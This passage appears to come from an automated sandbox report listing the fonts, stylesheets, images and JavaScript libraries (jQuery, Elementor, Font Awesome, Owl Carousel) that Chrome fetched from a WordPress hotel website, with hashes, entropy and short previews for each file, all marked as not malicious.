              Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pu
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:TrueType Font data, 13 tables, 1st "FFTM", 14 names, Macintosh
              Category:downloaded
              Size (bytes):67000
              Entropy (8bit):6.300806933038206
              Encrypted:false
              SSDEEP:
              MD5:079C7F4B457DB6B72BD6CCF8575CE4CF
              SHA1:7781F30925FBC983E3435D44EB535F1B680F809C
              SHA-256:18275CDB7923943ED6DBCDD17436131B62A850AA3A14B1B49E463D6FD2DA1C90
              SHA-512:8F7A0BE9B9CB45BDE0C459B81EF7FD9759CAC3C9ECE21422B78869FB34384E8B6315A73B3E3188452488272075B286066EBDB5307908F80925AC78B6519E22BD
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/fonts/Flaticon.ttf
              Preview:...........PFFTM..^.........OS/2P.^"...X...`cmap...........Jcvt ...D........gasp............glyf.........Phead..w........6hhea...........$hmtx...v........loca,Rd~........maxp.f.....8... nameb..L...h....post..My...$...o.........9n_.<....................................................................................#...............@.................L.f...G.L.f....................................PfEd... ...........J............... .....................o.......k.......j.h...................R.>.......N...........K.q.............].................................3.$...2.............3.................................................../...e...............F.............*.l...........6.......G.;...2.............r.r.s.j...L.L.+.......................@.........@.........@.......C.C.............{.v.{.......K...........,...............2.............4.@.4.>.`.`.Z.a.......$.:...........D.........................6.......................................n...........................D...........(....
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Unicode text, UTF-8 text, with very long lines (56113)
              Category:dropped
              Size (bytes):56154
              Entropy (8bit):5.235287226795041
              Encrypted:false
              SSDEEP:
              MD5:E7FCC0D272097507BFBE43D4EB9282DB
              SHA1:C2C6D530898B9BB75D87C99211818955A4C707E3
              SHA-256:F09639D5221135BF3C3C381319F9804AF78BD68D84C221DB1EFA6BD38F0ABE65
              SHA-512:8C363C7655C0FAD9D42B856DFA307907358382EBB9F25D86F3A6F9A230C68F3D34F888087234B39429A25A4B9367CBBC55F079FE738557184B9E4773D0DF1F18
              Malicious:false
              Reputation:unknown
              Preview:/*! elementor - v3.15.0 - 20-08-2023 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];for(const n of t)if(e.constructor.name===n.prototype[Symbol.toStringTag])return!0;return!1}},8135:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.ViewModule{getDefaultSettings(){return{selectors:{elements:".elementor-element",nestedDocumentElements:".elementor .elementor-element"},classes:{editMode:"elementor-edit-mode"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$elements:this.$element.find(e.elements).not(this.$element.find(e.nestedDocumentElements))}}getDocumentSettings(e){let t;if(this.isEdit){t={};const e=elementor.settings.page.model;jQuery.each(e.getActiveControls(),(n=>{t[n]=e.attributes[n]}))}else t=this.$element.data("elementor-sett
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):2238
              Entropy (8bit):5.355302440084898
              Encrypted:false
              SSDEEP:
              MD5:B6ED514E81A33E72EAA1CBA2D5DE448D
              SHA1:D2D4941752948E616B4FB13364CA1409E3FAC0A9
              SHA-256:D7843280D098690F7AD0BBD5E33AF9A826E246786F1D809934AE5AA63AC8AAD3
              SHA-512:65D3CE97029E982D6DF542BB911F38E7832D76B5014CF9DD385D664A35D4865F550BF601E63348CFFC49419827EEF7006F5FE735777D0F215373FC7C09553A48
              Malicious:false
              Reputation:unknown
              URL:https://fonts.googleapis.com/css?family=Sarala%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.6.2
              Preview:/* devanagari */.@font-face {. font-family: 'Sarala';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sarala/v12/uK_y4riEZv4o1w9hDBcSAv4.woff2) format('woff2');. unicode-range: U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;.}./* latin-ext */.@font-face {. font-family: 'Sarala';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sarala/v12/uK_y4riEZv4o1w9hAxcSAv4.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Sarala';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sarala/v12/uK_y4riEZv4o1w9hDRcS.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (18798)
              Category:dropped
              Size (bytes):18833
              Entropy (8bit):5.198890693042313
              Encrypted:false
              SSDEEP:
              MD5:F88D5720BB454ED5D204CBDB56901F6B
              SHA1:F1952292FDE4B15936E9AAC16B2B9896684DB95B
              SHA-256:726B820E44F6AB90AD991D30A4BF26D3A5D71493CBCD1FB1EFD0D14E89B9DF2A
              SHA-512:F7E3EC0C5B832116D75CAC2A5A40AB6FE673CC6C0996BD898F25850ED5555484D821E1FC4CA039C69DA3AB51FAA25613D622DB1177D7CDE16DA477145C3A6E22
              Malicious:false
              Reputation:unknown
              Preview:/*! This file is auto-generated */.!function(n,r){var t,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=r():"function"==typeof define&&define.amd?define("underscore",r):(n="undefined"!=typeof globalThis?globalThis:n||self,t=n._,(e=n._=r()).noConflict=function(){return n._=t,e})}(this,function(){var n="1.13.6",r="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},e=Array.prototype,F=Object.prototype,V="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=F.toString,q=F.hasOwnProperty,t="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=t&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Web Open Font Format (Version 2), TrueType, length 78268, version 331.-31196
              Category:downloaded
              Size (bytes):78268
              Entropy (8bit):7.996968270435637
              Encrypted:true
              SSDEEP:
              MD5:D824DF7EB2E268626A2DD9A6A741AC4E
              SHA1:0CCB2C814A7E4CA12C4778821633809CB0361EAA
              SHA-256:9834B82AD26E2A37583D22676A12DD2EB0FE7C80356A2114D0DB1AA8B3899537
              SHA-512:A84E13F216EA95146AF285AF98AEF0B464CD962440E161A1C602CA2178A179E04AE4ED2A2F98D5B2EB165480EC6920E0E88DE77D5F1EB7F11ED772B092DAF865
              Malicious:false
              Reputation:unknown
              URL:https://use.fontawesome.com/releases/v5.15.4/webfonts/fa-solid-900.woff2
              Preview:wOF2......1...........1b.K.$....................?FFTM....`..N.....h..B.6.$..0..4.. ..+...[.u..0..@p...J....P0.M.7.~3H..j......9........e.B....{....A1C.......tC`..T.}....P..hz.S.cBf...P. .<.."<.i..B......+...........B..0.gx..c)..hU.T.um+..4...:.`...!.3Cf..L.f.6..11.....W..0.."..]..4........B.o.x...3...-.z.$.>...eRw9..2-.8t.0....tE.O9.9........'%.R...d...~K).k....F.x#.....5.q..L...t..O.B..}..Y..p..N1:...vql... O.....>ouO...[..p.`.s.k.....Xo.m.....k...%.Z.G..H.<],.J..&.WL}.7.).....4..dh.......C...i.....y..X[{...HV.`V.B.JxQ........^......Vu./...*.2..8...gl9*.............4.GB..s.4.H..B.4..Xh?y..<..b.9..|...F.....&.?o~.U..*..v.:.......u..L;..........K..y0.0..:.?b..?.S..P..........my.y........X. .YK.z=%.ItG..8.E7.....{.'C.....gL0#DRH.~..."{. ..FAw.EE..p...5...[bC-....}6............G.7.~..Q_....._w..._w.f....L...T.1...s!..c3.:\.+.{C.......)Y.D........&Y.k7.}....w;..M..a.. @......v.....?a.8j..P...+8.l+......Wj.......G.._.0....".^...v.=`..p@&:.....
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (4918)
              Category:downloaded
              Size (bytes):4958
              Entropy (8bit):5.393435572247425
              Encrypted:false
              SSDEEP:
              MD5:957DA88059464DD1BADDEA5F3526B92B
              SHA1:0E00A87E60BAB6F1EAA6FC986C98B35842FA8153
              SHA-256:B9ABDD503536033070A944C44E36BC18812FC38D15749606A057254B298A232A
              SHA-512:1E686438F7CACD94D017EFBF6E3A212896F000EBF9134C267BE2F2C8105B62F26136A3BF8B28420BDCE269A48CDCA3B2578946EBFFF48C1375C22B200F39A463
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.15.3
              Preview:/*! elementor - v3.15.0 - 20-08-2023 */.(()=>{"use strict";var e,r,_,t,i,a={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,t,i)=>{if(!_){var a=1/0;for(u=0;u<e.length;u++){for(var[_,t,i]=e[u],n=!0,c=0;c<_.length;c++)(!1&i||a>=i)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[c])))?_.splice(c--,1):(n=!1,i<a&&(a=i));if(n){e.splice(u--,1);var o=t();void 0!==o&&(r=o)}}return r}i=i||0;for(var u=e.length;u>0&&e[u-1][2]>i;u--)e[u]=e[u-1];e[u]=[_,t,i]},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(e,t){if(1&t&&(e=this(e)),8&t)return e;if("object"==typeof e&&e){if(4&t&&e.__esModule)return e;if(16&t&&"function"==typeof e.then)return e}var i=Object.create(null);__webpack_require__.r(i);var a={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;"object"==typeo
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (4859)
              Category:dropped
              Size (bytes):242499
              Entropy (8bit):5.694360774001074
              Encrypted:false
              SSDEEP:
              MD5:B75D911DBD51983D293D6D23C91208E9
              SHA1:7B3264327AE188D8110C842C9A69348934BACBAC
              SHA-256:12B7741AF3353D4BCB38CAF9B5ED32FA19235AF67D272127ABCE421CA4C0C202
              SHA-512:54948BA4082AEC37B30B95D5141AF1E71E140AE81712847745C88CAD6FA2D4713A87E53855C7E71F070E143806FEBBEE62AC516DA156B0585F1D7F471F964DE4
              Malicious:false
              Reputation:unknown
              Preview:(function() {'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function ea(a){return function(){return this[a]}}function fa(a){return function(){return a}}var m;function ha(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ia=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ja(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var la=ja(this);function p(a,b){if(b)a:{var c=la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ia(c,a,{configurable:!0,writable:!0,value:b})}}.p("Symbol",function(a){function b(f){if(this instanceo
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (360)
              Category:downloaded
              Size (bytes):89992
              Entropy (8bit):5.084392122174397
              Encrypted:false
              SSDEEP:
              MD5:CCDF893E7D8B26933AF0C336BCC3943E
              SHA1:AC575BA3377F95EF22BAD865EC35B0B3DCB0DFE0
              SHA-256:DB9D6CF3C1C4B047C62F646E7D9991C06A212931C362BF53F9A2406B30F09466
              SHA-512:818DB99C2EB775D1342DC2CF871509185C5AD86A08C80E452F29B8509A870C43078E9F11113E999FF487A35B25B6DDD6B95B6A7F2C4408FDFCFDD69473F59510
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/js/owl.js?ver=1726496070
              Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */./**. * Owl carousel. * @version 2.3.4. * @author Bartosz Wojciechowski. * @author David Deutsch. * @license The MIT License (MIT). * @todo Lazy Load Icon. * @todo prevent animationend bubling. * @todo itemsScaleUp. * @todo Test Zepto. * @todo stagePadding calculate wrong active classes. */.;(function($, window, document, undefined) {.../**.. * Creates a carousel... * @class The Owl Carousel... * @public.. * @param {HTMLElement|jQuery} element - The element to create the carousel for... * @param {Object} [options] - The options.. */..function Owl(element, options) {..../**... * Current settings for the carousel.... * @public... */...this.settings = null;..../**... * Current options set by the caller including defaults.... * @public... */...this.options = $.extend({}, Owl.Defaults, options);..../**... * Plugin element.... *
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):11782
              Entropy (8bit):7.977144154362265
              Encrypted:false
              SSDEEP:
              MD5:A4D0DB7D80F3CB6230B271635EB0A785
              SHA1:EF83C79A598C5239D6832E5097492FB0354026D1
              SHA-256:5DB6887E4AE8B4A0B9AA588BE14429F1C21F6EC7C42B3AF18CB4269C2F66CA4E
              SHA-512:54060F10427CC05144334EEAE946D5DDF8835D7B3B068DBD1A011D281A7CA5C22F4DC942CB05BFE0C6A066428F36C9E84FDBA9CA185E4480F9019DC0E3A77CE7
              Malicious:false
              Reputation:unknown
              Preview:RIFF.-..WEBPVP8L.-../..?...8.m...v.9!.&.....^.p\....=...)...9.V^.:.$.....?....m....F.a.NNI..\...%./...... .(.R.b..jf%..P .........\M..<........D....Vi.! ...f.Y.44...k....O....).Q.@...^.n.x .#x .....+..O..Q..g.$;...E......^...?..jt..8......X...`..=...m...-.$...@...;B.......H...BZk.....S.R....D...$[U............-.v..;P.s.^.-9B...+/y.Ohgv.....T.s5...9.......6lDt.//v......iJ.jei......Q..I...P`..@..Xul.~K...b...L..T..*...M.mlzX..p.%c.n...K.T..\........d.\V........~o)..d...A..V...\..n......_.s$.J:e#.$....v.G.&Z".....>H....,.zF...cgpU...(..v........o.$p...O.i..S{..9...b.av..n...n.K...(.I...4...w.N....3.\......|...`t.cT.6z|.....Z....,31L.ls..p.... .86.W.M..UT..J....J..YP..v..I;.K.:.).4.g.R.n..w...Impu){....$k..H.^.Ue.!.....P....q.i.......K.A0.[n..K..!.T.o.nZ.w.%.Q._zQ...WIU.%.MC5..z..|rU.../..n..........Y.mG2.J..../.gX..sB...].g.8.JKF.......A.....kT.k..)..%M.B...'.1...i...SX~*.]UB..V.y.N..PJ..J:U.....J.({N...h..B}*..T..".......W..*
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):302
              Entropy (8bit):5.4357451956521
              Encrypted:false
              SSDEEP:
              MD5:A61BAD8B26EF8914546AED6B68CCF7A3
              SHA1:AA77241CCEDDDBCBFB19BA28E07DE8280E1F1CBF
              SHA-256:9E06028665131F0A17F015003AC578BA216CE432EB0A6B787A7A1153F4A9721B
              SHA-512:D6A76313258E5B0DF752E6E7F3D98478C6D09619F8A444B2A8B0771385D04028A42091E01301EAA1A47D86F4BD9A3E2698A13D709D95D63937F607C944CB5622
              Malicious:false
              Reputation:unknown
              URL:https://fonts.googleapis.com/css?family=Google+Sans+Text_old:400&text=%E2%86%90%E2%86%92%E2%86%91%E2%86%93&lang=en
              Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */.@font-face {. font-family: 'Google Sans Text';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/l/font?kit=5aUu9-KzpRiLCAt4Unrc-xIKmCU5mEhkgo3FI_E8lH570oBdIw&skey=b20c8ebc9802c116&v=v22) format('woff2');.}.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (6269), with CRLF line terminators
              Category:dropped
              Size (bytes):6300
              Entropy (8bit):5.140262021657212
              Encrypted:false
              SSDEEP:
              MD5:11AC4D7173A68C50169ADDCA2EF1B827
              SHA1:621284D032A248C41753E995680FC30089BD374C
              SHA-256:DD90FDB6538987FE7975BD43803B1C7D8D62912A371C788CAEC32D016E09DCA8
              SHA-512:658888B9D89577B55798FC56451F9458BA9B4885573A96480FD9BD480CB59854769964DA9A5F54FEBA19BA66FA6DF44C79203D35F1D6D9CAFD84886C58E233A4
              Malicious:false
              Reputation:unknown
              Preview:/*! WOW - v1.0.1 - 2014-08-15..* Copyright (c) 2014 Matthieu Aussaguel; Licensed MIT */(function(){var a,b,c,d=function(a,b){return function(){return a.apply(b,arguments)}},e=[].indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(b in this&&this[b]===a)return b;return-1};b=function(){function a(){}return a.prototype.extend=function(a,b){var c,d;for(c in b)d=b[c],null==a[c]&&(a[c]=d);return a},a.prototype.isMobile=function(a){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(a)},a}(),c=this.WeakMap||this.MozWeakMap||(c=function(){function a(){this.keys=[],this.values=[]}return a.prototype.get=function(a){var b,c,d,e,f;for(f=this.keys,b=d=0,e=f.length;e>d;b=++d)if(c=f[b],c===a)return this.values[b]},a.prototype.set=function(a,b){var c,d,e,f,g;for(g=this.keys,c=e=0,f=g.length;f>e;c=++e)if(d=g[c],d===a)return void(this.values[c]=b);return this.keys.push(a),this.values.push(b)},a}()),a=this.MutationObserver||this.WebkitMutationObserver||this.MozMutationObserv
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):1884
              Entropy (8bit):5.023974235758346
              Encrypted:false
              SSDEEP:
              MD5:6783C9A93A92A5035D238F81275BC75B
              SHA1:1666F08046A51249CC71216597B91C825AFB74B8
              SHA-256:3E47E0CD0DA9676D13CD525888C155E81E5A2F4FADBE1D3F64BD79592440179C
              SHA-512:2386F9DFA585441B9F2A72F4FAF73C41D0D1191FC9FD3AC7ABDEAE9B0EC1716E0941251553311671D58E23AF0917BBFC7B5CF7EAE00DA028A87A6BFCB9C36B02
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/css/booking-single-room.css?ver=2.1.1-02
              Preview:.#hotel_booking_room_hidden {..margin: 0 auto;..max-width: 1000px;..min-width: 500px;..background: #fff;..overflow: hidden;.}../* #hotel_booking_room_hidden * {..color: #777;.} */..hotel_booking_room_errors{..color: #f00;.}.#hotel_booking_room_hidden .mfp-close {..display: none;.}..#hotel_booking_room_hidden .hb_button {..color: #fff;.}..#hotel_booking_room_hidden form > div {..padding: 10px;..overflow: hidden;.}...hb-booking-room-form-head {..text-align: center;.}...hb-booking-room-form-head h2 {..margin: 0;..padding: 10px;..text-transform: uppercase;..text-align: center;.}...hb-search-results-form-container {..overflow: hidden;..border-bottom: 1px solid rgba(216, 212, 213, 0.62);..border-top: 1px solid rgba(216, 212, 213, 0.62);.}..hb-search-results-form-container p.no-extra{..text-align: center;..color: #cc1818;.}..hb-search-results-form-container .hb-booking-room-form-group {..width: 30%;..float: left;..margin-left: 3%;.}...hb-search-room-results.hotel-booking-search {..padding: 15
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):17459
              Entropy (8bit):5.42589411264225
              Encrypted:false
              SSDEEP:
              MD5:20D1C2D49DC65496B30BA23A38D3E550
              SHA1:6220CA5FE09370C5ABD7FFDAF3E64CC684BB6D6F
              SHA-256:5B1F24563E3BDCCBADBAA2E43AE26C661A0AD388661FB6613A9F0725AF35603A
              SHA-512:593DE0DF5938C376D8F8A74770DB133182C745E78DE7A58AA4FD8CBCE7B432DEFCA8D05EE97BB7193AF8EA4D5083BDA3758DC3717A47EF053B8F6EE73A1EA5DE
              Malicious:false
              Reputation:unknown
              URL:https://fonts.googleapis.com/css?family=Roboto%3Aital%2Cwght%400%2C100%3B0%2C300%3B0%2C400%3B0%2C500%3B0%2C700%3B0%2C900%3B1%2C100%3B1%2C300%3B1%2C400%3B1%2C500%3B1%2C700%3B1%2C900%7CYeseva+One&subset=latin%2Clatin-ext
              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOkCnqEu92Fr1Mu51xFIzIFKw.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOkCnqEu92Fr1Mu51xMIzIFKw.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOkCnqEu92Fr1Mu51xEIzIFKw.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOkCnqEu92Fr1Mu51xLIzIFKw.woff2) format('woff2');. unicode-range:
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:downloaded
              Size (bytes):8937
              Entropy (8bit):4.875090918354912
              Encrypted:false
              SSDEEP:
              MD5:38ACA185E75CCB39D6770ECC1B43B61E
              SHA1:CCA0994B7510FEBE57C190F6F0F9EB9CD44BA74F
              SHA-256:A04B19B693B3EB3E645BFB7EFDC446697F92675AF041771A6678D5A4F9E305B0
              SHA-512:49744BD8E91B28A859BCEC72E9D12B4B0B48FCDE1817C290937D2807AC963E6076DC1CF05DEC1D9EE07257E565A42791DF4808327F39AE5DADFCFBC95C848F0C
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/includes/libraries/magnific-popup/css/magnific-popup.css?ver=2.1.1-02
              Preview:/* Magnific Popup CSS */...mfp-bg {.. top: 0;.. left: 0;.. width: 100%;.. height: 100%;.. z-index: 1042;.. overflow: hidden;.. position: fixed;.. background: #0b0b0b;.. opacity: 0.8;.. filter: alpha(opacity=80); }.....mfp-wrap {.. top: 0;.. left: 0;.. width: 100%;.. height: 100%;.. z-index: 1043;.. position: fixed;.. outline: none !important;.. -webkit-backface-visibility: hidden; }.....mfp-container {.. text-align: center;.. position: absolute;.. width: 100%;.. height: 100%;.. left: 0;.. top: 0;.. padding: 0 8px;.. -webkit-box-sizing: border-box;.. -moz-box-sizing: border-box;.. box-sizing: border-box; }.....mfp-container:before {.. content: '';.. display: inline-block;.. height: 100%;.. vertical-align: middle; }.....mfp-align-top .mfp-container:before {.. display: none; }.....mfp-content {.. position: relative;.. display: inline-block;.. vertical-align: middle;.. margin: 0 auto;.. text-align: left;.. z-index: 1045; }.....mfp-inline-holder .mfp-c
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (65447)
              Category:dropped
              Size (bytes):87553
              Entropy (8bit):5.262620498676155
              Encrypted:false
              SSDEEP:
              MD5:826EB77E86B02AB7724FE3D0141FF87C
              SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
              SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
              SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
              Malicious:false
              Reputation:unknown
              Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):10488
              Entropy (8bit):7.978491214608584
              Encrypted:false
              SSDEEP:
              MD5:47C7068190D573640C0F35E976CCC5CB
              SHA1:09E09F8EC7FAB6B72FD72D1EC9654F65BB835A7B
              SHA-256:3199F8FFF6E1702B24D8F0D1D3F149C15F52480943F6BA2A8AFBECD122730904
              SHA-512:7D333CF9F04AD2F46694E8AD808947CDA65197B20986E62F2A5220C8B1EC91FEB19D6BD7E0D752D2F964A100920FB87A002F6AECF01719E6B2E1BF0A4A2AD905
              Malicious:false
              Reputation:unknown
              Preview:RIFF.(..WEBPVP8L.(../..?...6.mS.6#...O?5....p.I.R=.. ..,...1h$I..33.xG._.........1..................r...L..v.Y*M....@..RH@.....$ ..v....O...r/..._K.xI..>. ...Q....6.Y.TI7....D......~k.>i...Q./.h.G.4....^...Y.m..D.../."....K-9.G.jq...... .......C.v..b.z.*...{..`....I4.xE#....5...7..q.A....1H..v{I.*....<..Cys....k.2.....Vh..o`8k..X.......".1........x...p..k.x....a.._.\m.$h.......C.^_....0.r..p.f!L..............y.....>+.$b{.g./...7.....8...?..!.G.V"..y..u...xR.m.i.o.......w......B....u.:?d+H.3.C7............v.....t.......C}.&.v(C.x...w..t.../.*..Y.....j((....Wi...a.a.Q.........?r...Z.y.......Dd..c}$..c:z.(.p.0L.o......[.Gr.....he.5X......&.~R.T.z.y..Q2.&.q.o....y......L...(.7.Y....7...i....p<.q>..|......""..5..`..{.7c!mJ9R>.i.g....c...)j.!aj...-[No8.....v..2gX,).`....CD..h...............'.....V..i...m...yS..VN..W....S.8..o2..p........n8.0`..L..... ...e.>.n..a.%...9...`.&....f..,.:..V....Lk?b.u...4......3.!0..n..k6..F8./....Ob.......(5.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (40706)
              Category:downloaded
              Size (bytes):40746
              Entropy (8bit):5.271033002077934
              Encrypted:false
              SSDEEP:
              MD5:6B7DBA1E872E793C1DC18B311A47A307
              SHA1:12B293F8A0FCA95C7E45660E5857EBEA971C4012
              SHA-256:5B8B298C881F1A435AD75016F8318D75F3338243989CF6FCC283FA5F02EE74C5
              SHA-512:BED7AFB35EFD4B2787253C981B94321EAAD1F6AEA0D858FF1A0A6F0484F0B63DA77DDC5C30DFE65A567F09BAE28247C45518D487AB17F81571B08C1EDDA8C176
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.15.3
